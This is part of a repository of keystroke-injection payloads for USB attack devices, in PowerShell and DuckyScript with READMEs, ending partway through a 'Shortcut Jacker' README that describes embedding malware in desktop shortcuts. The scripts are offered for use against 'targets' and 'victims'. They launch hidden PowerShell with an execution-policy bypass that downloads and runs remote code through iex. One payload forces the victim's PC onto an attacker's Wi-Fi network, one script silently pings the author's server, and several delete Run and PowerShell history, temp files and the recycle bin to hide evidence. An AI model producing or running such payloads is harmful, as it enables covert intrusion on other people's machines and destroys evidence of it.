@(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),\n @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),\n @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)\n\n# -------------------------------------------------------------------------------------------\t\t\n\n\nfunction PS-Draw { \n [CmdletBinding()]\n param ( \n [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n [Alias(\"I\")]\n [object[]]$Image\n )\n\n # if the data is sent through the pipeline, use $input to collect is as array\n if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }\n #$Data | Out-String -Stream -Width 9999 | ForEach-Object { \"$($_.Trim())`r`n\" }\n\n cls\n \n foreach ($row in $Image) {\n foreach ($position in $row) {\n Write-Host \" \" -NoNewline -BackgroundColor $Colors[$position]\n Start-Sleep -m 10\n }\n Write-Host \"\"\n }\n}\n\n<#\n\n.NOTES \n\tThis will get either the targets full name associated with the registered microsoft account \n\tor it will default to grabbing the username of the account to use as a greeting for this script\n#>\n\n function Get-fullName {\n\n try {\n\n $fullName = Net User $Env:username | Select-String -Pattern \"Full Name\";$fullName = (\"$fullName\").TrimStart(\"Full Name\")\n\n }\n \n # If no name is detected function will return $env:UserName \n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No name was detected\" \n return $env:UserName\n -ErrorAction SilentlyContinue\n }\n\n return $fullName \n\n}\n\n# -------------------------------------------------------------------------------------------\n\n# Get name to be used in greeting\n\ncls\n\n$fullName = Get-fullName\n\necho \"Hello $fullName\"\n\n# -------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThen the script will be paused until the mouse is moved \n\tscript will check mouse position every indicated number of seconds\n\tThis while loop will constantly check if the mouse has been moved \n\t\"CAPSLOCK\" will be continuously pressed to prevent screen from turning off\n\tit will then sleep for the indicated number of seconds and check again\n\twhen mouse is moved it will break out of the loop and continue the script\n#>\n\n\nAdd-Type -AssemblyName System.Windows.Forms\n$o=New-Object -ComObject WScript.Shell\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n\n<#\n\n.NOTES \n\tThis is where you call the function to draw out one of the images above \n\t$col - to see the available colors you can use for a custom image \n\t$hak5 - this will draw out the hak5 five logo\n\t$omg - this will draw out the omg logo \n#>\n\n# -------------------------------------------------------------------------------------------\n\n# Call function with one of the arrays listed above to generate an image\n\n$hak5 | PS-Draw\n\n\n" }, { "path": "Payloads/Flip-PS-Draw/PS-Draw.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThis script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works \n\twell. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My example image is 25x20 pixels\n\tTo increase the size of the pixels add more spaces to the following Write-Host command.\n\tWrite-Host \" \" -NoNewline -BackgroundColor $BackGround \n\n.DESCRIPTION \n\tThis program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color\n\tthat can be used in powershell. Finally that image will be drawn in a powershell window. \n\n.SYNTAX \n\t\"$env:TMP\\omg-ico.png\" | PS-Draw\n\tPS-Draw -Path \"$env:TMP\\omg-ico.png\"\n#>\n############################################################################################################################################################\n\nFunction PS-Draw\n{\n param(\n [String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,\n [Switch] $ToASCII\n )\n Begin\n {\n [void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')\n \n # Console Colors and their Hexadecimal values\n $Colors = @{\n 'FFFFFFFF' = 'White'\n 'FF000000' = 'Black' \n 'FF000080' = 'DarkBlue' \n 'FF008000' = 'DarkGreen' \n 'FF008080' = 'DarkCyan' \n 'FF800000' = 'DarkRed' \n 'FF800080' = 'DarkMagenta' \n 'FF808000' = 'DarkYellow' \n 'FFC0C0C0' = 'Gray' \n 'FF808080' = 'DarkGray' \n 'FF0000FF' = 'Blue' \n 'FF00FF00' = 'Green' \n 'FF00FFFF' = 'Cyan' \n 'FFFF0000' = 'Red' \n 'FFFF00FF' = 'Magenta' \n 'FFFFFF00' = 'Yellow' \n \n }\n \n # Algorithm to calculate closest Console color (Only 16) to a color of Pixel\n Function Get-ClosestConsoleColor($PixelColor)\n {\n ($(foreach ($item in $Colors.Keys) {\n [pscustomobject]@{\n 'Color' = $Item\n 'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))\n } \n }) | Sort-Object Diff)[0].color\n }\n }\n Process\n {\n Foreach($item in $Path)\n {\n #Convert Image to BitMap \n $BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)\n\n Foreach($y in (1..($BitMap.Height-1)))\n {\n Foreach($x in (1..($BitMap.Width-1)))\n {\n $Pixel = $BitMap.GetPixel($X,$Y) \n $BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))\n \n\n If($ToASCII) # Condition to check ToASCII switch\n {\n Write-Host \"$([Char](Get-Random -Maximum 126 -Minimum 33))\" -NoNewline -ForegroundColor $BackGround\n }\n else\n {\n Write-Host \" \" -NoNewline -BackgroundColor $BackGround\n }\n }\n Write-Host '' # Blank write-host to Start the next row\n }\n } \n \n }\n end\n {\n \n }\n\n}\n\n<#\n\n.NOTES \n\tThis will get either the targets full name associated with the registered microsoft account \n\tor it will default to grabbing the username of the account to use as a greeting for this script\n#>\n\n function Get-fullName {\n\n try {\n\n $fullName = Net User $Env:username | Select-String -Pattern \"Full Name\";$fullName = (\"$fullName\").TrimStart(\"Full Name\")\n\n }\n \n # If no name is detected function will return $env:UserName \n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No name was detected\" \n return $env:UserName\n -ErrorAction SilentlyContinue\n }\n\n return $fullName \n\n}\n\n# -------------------------------------------------------------------------------------------\n# Download the image from wherever you are hosting it\n\niwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\\omg-ico.png\n\n# -------------------------------------------------------------------------------------------\n\n# Get name to use in the greeting\n\ncls\n\n$fullName = Get-fullName\n\necho \"Hello $fullName\"\n# -------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThen the script will be paused until the mouse is moved \n\tscript will check mouse position every indicated number of seconds\n\tThis while loop will constantly check if the mouse has been moved \n\t\"CAPSLOCK\" will be continuously pressed to prevent screen from turning off\n\tit will then sleep for the indicated number of seconds and check again\n\twhen mouse is moved it will break out of the loop and continue the script\n#>\n\n\nAdd-Type -AssemblyName System.Windows.Forms\n$o=New-Object -ComObject WScript.Shell\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n\n\n<#\n\n.NOTES \n\tThis is where you call the function to draw out your image\n\tReplace the path below with the path of your image \n\n.SYNTAX \n\t\"$env:TMP\\omg-ico.png\" | PS-Draw\n\tPS-Draw -Path \"$env:TMP\\omg-ico.png\"\n#>\n\n# -------------------------------------------------------------------------------------------\n\n# Call the function with the image you'd like to have drawn here\n\n\"$env:TMP\\omg-ico.png\" | PS-Draw\n\n" }, { "path": "Payloads/Flip-PS-Draw/PS-Draw.txt", "content": "REM Title: PS-Draw\nREM\nREM Author: I am Jakoby\nREM\nREM Description: This payload is meant to draw images in your targets powershell console. See PS-Draw.ps1 for more details\nREM\nREM Target: Windows 10, 11\nREM\nREM Remember to replace the link with your link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\nREM\nREM Download one of the two PS-Draw Execute files provided and execute it \nREM\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\nENTER\n" }, { "path": "Payloads/Flip-PS-Draw/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# PS-Draw\n\nA script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims.\n\n## Description\n\nThese two programs use two different methods to draw out images in the PowerShell window.\n\nPS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors, \nthen draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well. \n\nPS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself. \nThese images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.\n\nAfter the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the \nUserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window. \n\n## Getting Started\n\n### Dependencies\n\n* DropBox or another image hosting service - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your Device\n* Invoke-WebRequest will be used to download the image \n\n```\npowershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1\n```\n* The image will be converted into a BMP file\n* An algorithm will be used to find the closest matching colors available in the powershell window\n* The image will be generated in the powershell window\n\nThis is an example of an image I used with the PS-Draw command \n\n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/omg-ico.png?raw=true)\n\nThis is how the iamge is interpreted and drawn out \n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/PS-Draw.jpg?raw=true)\n\n* The PS-Custom-Draw operates a little differently \n* One of the preconfigured arrays is piped into the command to generate an image \n \n* \"$col | PS-Draw\" - This first one will show the available colors to be used as seen below\n \n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-colors.jpg?raw=true)\n\n\n* \"$omg | PS-Draw\" - This will draw out the OMG logo as seen below\n \n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-omg.jpg?raw=true)\n\n\n* \"$hak5 | PS-Draw\" - This will draw out the Hak5 logo as seen below\n \n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-hak5.jpg?raw=true)\n\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-PineApple/PineApple-KeyInjection.txt", "content": "REM Title: PineApple\nREM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it\nREM This version is a direct key stroke injection attack\nREM Author: I am Jakoby\nREM Target: Windows 10, 11\nREM\nDELAY 1000\nREM\nREM If the wifi pineapple SSID is detected target PC will connect to it \nREM\nGUI r \nDELAY 500\nSTRING powershell\nDELAY 500\nENTER\nREM\nDELAY 1000\nREM\nSTRING $profilefile=\"Home.xml\";\nSHIFT ENTER\nSTRING $SSID=\"PineApple\";\nSHIFT ENTER\nSTRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''\nSHIFT ENTER\nDELAY 500\nSTRING $xmlfile=\"\nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING $SSID\nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING $SSIDHEX\nSHIFT ENTER\nSTRING $SSID\nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING ESS\nSHIFT ENTER\nSTRING manual\nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING open\nSHIFT ENTER\nSTRING none\nSHIFT ENTER\nSTRING false\nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \nSHIFT ENTER\nSTRING \"\nSHIFT ENTER\nSTRING $XMLFILE > ($profilefile)\nSHIFT ENTER\nSTRING netsh wlan add profile filename=\"$($profilefile)\"\nSHIFT ENTER\nSTRING netsh wlan connect name=$SSID\nSHIFT ENTER\nSTRING reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath\nREM\nDELAY 500\nENTER\n" }, { "path": "Payloads/Flip-PineApple/PineApple.ps1", "content": "$profilefile=\"Home.xml\"\n$SSID=\"PineApple\"\n$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''\n$xmlfile=\"\n\n$SSID\n\n\n$SSIDHEX\n$SSID\n\n\nESS\nmanual\n\n\n\nopen\nnone\nfalse\n\n\n\n\n\"\n$XMLFILE > ($profilefile)\nnetsh wlan add profile filename=\"$($profilefile)\"\nnetsh wlan connect name=$SSID\n\n#----------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\niwr \"https://jakoby.lol/hak5\" -EA 0 >$null\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n" }, { "path": "Payloads/Flip-PineApple/PineApple.txt", "content": "REM Title: PineApple\nREM\nREM Author: I am Jakoby\nREM\nREM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it\nREM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile\nREM The powershell script needed is provided as OMG-PineApple.ps1\nREM\nREM Target: Windows 10, 11\nREM\nREM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\nREM\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\nENTER\n" }, { "path": "Payloads/Flip-PineApple/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# PineApple\n\nA script used to connect a targets PC to your Wifi PineApple.\n\n## Description\n\nThis program will generate an XML file that will be used to create a network profile for your Wifi PineApple. \nThe XML file will be manually entered into a PowerShell window. \nThe PowerShell window and run box will be erased for a clean exit. \n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* The entire script will be manually entered into the powershell window \n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-Play-WAV/Play-WAV.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Execution | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThis script requires you to have a DropBox account or another file hosting service\n\n.DESCRIPTION \n\tThis program downloads a sound from your DropBox\n\tTurns the volume to max level on victims PC\n\tPauses the script until a mouse movement is detected\n\tThen plays the sound with nothing popping up catching your victim off guard\n\tFinally a few lines of script are executed to empty TMP folder, clear Run and Powershell history\n\n#>\n\n############################################################################################################################################################\n\n# Download Sound (When using your own link \"dl=0\" needs to be changed to \"dl=1\")\n# This is for if you want to host your own instance of this script\n\n#$wav = \"\"\n\niwr $wav -O $env:TMP\\e.wav\n\n############################################################################################################################################################\n\n# This turns the volume up to max level\n$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}\n\n############################################################################################################################################################\n\n# This while loop will constantly check if the mouse has been moved \n# if the mouse has not moved \"SCROLLLOCK\" will be pressed to prevent screen from turning off\n# it will then sleep for the indicated number of seconds and check again\n\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n############################################################################################################################################################\n\n# Play Sound \n$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation=\"$env:TMP\\e.wav\";$PlayWav.playsync()\n\n############################################################################################################################################################\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n" }, { "path": "Payloads/Flip-Play-WAV/Play-WAV.txt", "content": "REM Title: Play-WAV\nREM\nREM Author: I am Jakoby\nREM\nREM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details\nREM\nREM Target: Windows 10, 11\nREM\nREM Remeber to replace the link with your link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\nREM\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex\nDELAY 500\nENTER\n" }, { "path": "Payloads/Flip-Play-WAV/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Play-WAV\n\nA script used to download a WAV file and play it after a mouse movement is detected.\n\n## Description\n\nThis program starts off by using an Invoke-WebRequest to download a WAV file. \nThe system volume is then turned up to the max level. \nThen the script will be paused until a mouse movement is detected. \nAfter a mouse movement is detected, the WAV file will be played.\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Place the WAV URL in the $wav variable\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download your WAV file\n \n```\npowershell -w h -NoP -NonI -Ep Bypass $wav='';irm https://jakoby.lol/vus | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1", "content": "############################################################################################################################################################ \r\n# | ___ _ _ _ # ,d88b.d88b # \r\n# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \r\n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \r\n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\r\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\r\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \r\n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \r\n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \r\n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \r\n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \r\n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\r\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\r\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \r\n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \r\n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \r\n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\r\n############################################################################################################################################################\r\n\r\n<#\r\n.SYNOPSIS\r\n\tThis script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers.\r\n\r\n.DESCRIPTION \r\n\tThis program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up \r\n\tfor each one of them. \r\n#>\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n\r\n# The number of times you want it to cycle through your list of questions\r\n\r\n$cycles = 3\r\n\r\n# List as many questions here as you like, it will cycle through all of them\r\n\r\n$msgs = @(\r\n\"Are all scammers as dumb as you?\"\r\n\"Is the pay worth being this big of a loser?\"\r\n\"Do your parents know what you do for a living?\"\r\n\"Does you boss know much much you suck at this job?\"\r\n)\r\n\r\nfor ($i=1; $i -le $cycles; $i++) {\r\n\r\nForeach ($msg in $msgs) {\r\n[System.Windows.Forms.MessageBox]::Show($msg , \"You're-a-Loser.exe\" , 4 , 'Question')\r\n}\r\n}\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to clean up behind you and remove any evidence to prove you were there\r\n#>\r\n# Delete contents of Temp folder \r\n\r\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\r\n\r\n# Delete run box history\r\n\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\r\n\r\n# Delete powershell history\r\n\r\nRemove-Item (Get-PSreadlineOption).HistorySavePath\r\n\r\n# Deletes contents of recycle bin\r\n\r\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\r\n" }, { "path": "Payloads/Flip-Rage-PopUps/Rage-PopUps.txt", "content": "REM Title: Rage-PopUps\nREM\nREM Author: I am Jakoby\nREM\nREM Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details\nREM\nREM Target: Windows 10, 11\nREM\nREM Remeber to replace the link with your link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\nREM\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\nDELAY 500\nENTER\n" }, { "path": "Payloads/Flip-ShortcutJacker/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n \n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Shortcut Jacker\n\n

\n \n \"Python\"\n \n
YouTube Tutorial\t\n

\n\nA script used to embed malware in the shortcut on your target's desktop.\n\n## Description\n\nThis payload will run a PowerShell script in the background of any shortcut used on the target's desktop.\n\nThis is done by taking advantage of the `Target` field where PowerShell commands can be stored or run. \n\nThis field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run. \n\nSo if your command exceeds that, consider using an IWR function to download and execute a longer script. \n\nI have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)\n\n\n\nInside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored.\n\n---------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n\n---------------------------------------------------------------------------------------------------------------------------------------------------------\n\nUsing the `Get-Shortcut` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the `Target` field.\n\n\n\n## Getting Started\n\nOnce the script is executed, all of the 